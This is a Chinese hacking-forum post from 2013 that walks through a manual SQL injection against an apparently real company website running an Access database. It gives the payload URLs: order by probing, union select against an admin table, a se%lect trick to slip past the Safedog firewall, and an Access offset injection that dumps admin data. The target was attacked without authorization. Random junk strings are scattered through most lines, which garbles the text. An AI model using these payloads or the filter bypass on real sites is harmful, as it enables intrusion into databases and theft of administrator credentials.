找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2053|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
7 a( d9 C8 f# {. ~, k* {6 `6 F' f) A8 U' v. m
3 p! e; l- K2 k  s4 x1 s
顺手加个admin2 J5 f. F( U1 ?

5 W7 v8 ]+ X' N3 D
8 l7 J  D* S5 n  i8 Y7 C, Z: e  T默认后台。
1 q* e: y# p9 L: w回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​+ H' ~# L, K0 A& I- h' ~4 g& X4 S. o
- n0 ^" u) B4 Y6 D. m+ \0 g
7 b0 r0 f( _5 v& Q! Y# x* G6 c
- ^2 p7 U. F! p# A7 e
所以就不用御剑扫了,待会直接封IP。
( |8 C! q' G. y3 R# r" n
# q. w( B# W1 Q* W& U/ }/ F用order by语句判断是否存在注入。( U) `7 f2 N' s7 N5 L. H
http://www.xxx.com /product_show.asp?id=997 order by 1
- T) j; a/ q* v& ~http://www.xxx.com /product_show.asp?id=997 order by 1007 J& m0 L3 e1 V7 H6 L2 V0 ~* L0 y
现在存在注入,经测试后发现是9个字段。: h1 U* D1 O$ v9 w/ |
7 j* H! I8 j( P* m9 u2 Q- n
接下来进行联合查询,猜是否存在admin表。
) n$ S$ }6 p6 Y2 @1 R" O( Chttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
! [9 X1 \! I- q5 [& v  _7 }' D0 Y, k8 F, l, V* T" W# g( v" {5 o

8 m0 I: I( C- X8 x9 N9 k
% h/ d: n- k" P8 M' L4 d8 K, Y在select中间加个%,se%lect绕过安全狗。; t- e# b: O, N5 r( |- K; [8 F1 R2 K
8 {5 r  ]- }( W$ l3 d2 f

% {5 h9 g& r8 n1 a3 p发现存在admin表,然后开始手工猜常用的字段。
% W. C/ c8 S7 |; T% b( [+ `纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。$ P" V6 o' r( D7 _& {
8 [- f( h2 g; i8 h
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
& c& F- a7 w/ b4 w
! a0 R1 p7 h& x5 K5 h科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。. K1 x! A- C5 l7 [( W
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
6 V8 Y; O% v* X  |4 _# |/ W好了,敏感内容出显了。​3 X0 G4 ]: J# {4 B. m
9 D( X& n8 K! L
! q+ D- w" R8 }* A4 V( w/ U

* O( U- a" G5 ^" y8 x! }9 ]1 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表